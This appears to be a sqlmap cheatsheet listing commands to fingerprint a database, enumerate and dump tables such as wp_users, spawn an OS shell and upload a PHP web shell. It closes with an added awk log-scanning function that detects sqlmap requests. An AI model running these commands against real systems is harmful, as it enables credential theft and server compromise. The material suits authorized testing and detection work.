SqlMap Cheatsheet


sqlmap is an amazing and super useful penetration testing tool that automates the process of detecting and exploiting SQL injection.

Get DBMS banner

Syntax:

sqlmap -u "<url>" -p <parameter vulnerable> -b

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id -b

Get current database name

Syntax:

sqlmap -u "<url>" -p <parameter vulnerable> --current-db

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id --current-db

Get current username

Syntax:

sqlmap -u "<url>" -p <parameter vulnerable> --current-user

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id --current-user

Get the list of tables in a database

Syntax:

sqlmap -u "<url>" -p <parameter vulnerable> -D <database_name> --tables

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id -D wordpress_db --tables

Get the list of columns in a table

Syntax:

sqlmap -u "<url>" -p <parameter_vulnerable> -D <database_name> -T <table_name> --columns

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id -D wordpress_db -T wp_users --columns

Dump table information

Syntax:

sqlmap -u "<url>" -p <parameter_vulnerable> -D <database_name> -T <table_name> --dump

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id -D wordpress_db -T wp_users --dump

Spawn a Shell

Syntax:

sqlmap -u "<url>" -p <parameter_vulnerable> -D <database_name> --os-shell

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id -D wordpress_db --os-shell

Uploading a shell

Syntax:

sqlmap -u "<url>" --file-dest="<remoteDirectory>" --file-write="<yourLocalFile.php>"

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id --file-dest="/var/www/uploads/shell.php" --file-write="/tmp/myshell.php"

Executing a Query

Syntax:

sqlmap -u "<url>" -p <parameter_vulnerable> -D <databaseName> --sql-query <sql_sentence>

Example:

sqlmap -u "http://target.com/vulnerable.php?id=123" -p id -D wordpress_db --sql-query "Select * from wp_users;"
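
Spotting these runs in the access log

Every command above sends its requests through the id query parameter, so the web server's access log is where such a test shows up. The following is an added example, not part of the original cheatsheet or of sqlmap: a shell function that flags such requests in a combined-format log. It assumes sqlmap's default User-Agent (which begins with "sqlmap/") is still in use and that id is normally numeric; the function names and log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag requests that look like sqlmap activity against the
# numeric "id" parameter used throughout this cheatsheet.

# Constructed sample log (combined format, documentation IP ranges).
sample_log() {
cat <<'EOF'
198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /vulnerable.php?id=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2024:10:00:05 +0000] "GET /vulnerable.php?id=123 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Jan/2024:10:00:06 +0000] "GET /vulnerable.php?id=123%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2024:10:00:09 +0000] "GET /index.php?page=2&id=77 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
EOF
}

# Reads a combined-format access log on stdin.
# Prints one line per suspicious request: "<client ip> <reason> <request target>".
flag_sqlmap_requests() {
  awk -F'"' '
    {
      split($1, pre, " "); ip = pre[1]          # client address
      split($2, req, " "); target = req[2]      # path plus query string
      ua = $6                                   # User-Agent header
      reason = ""
      if (ua ~ /^sqlmap\//) {
        reason = "default-user-agent"           # tool announced itself
      } else if (target ~ /[?&]id=/) {
        val = target
        sub(/^.*[?&]id=/, "", val)              # keep only the id value
        sub(/&.*$/, "", val)
        if (val !~ /^[0-9]+$/) reason = "non-numeric-id"
      }
      if (reason != "") print ip, reason, target
    }'
}

# Stand-alone run over the constructed sample.
sample_log | flag_sqlmap_requests
```

The same function works on a real log with flag_sqlmap_requests < access.log, provided the server writes the combined format.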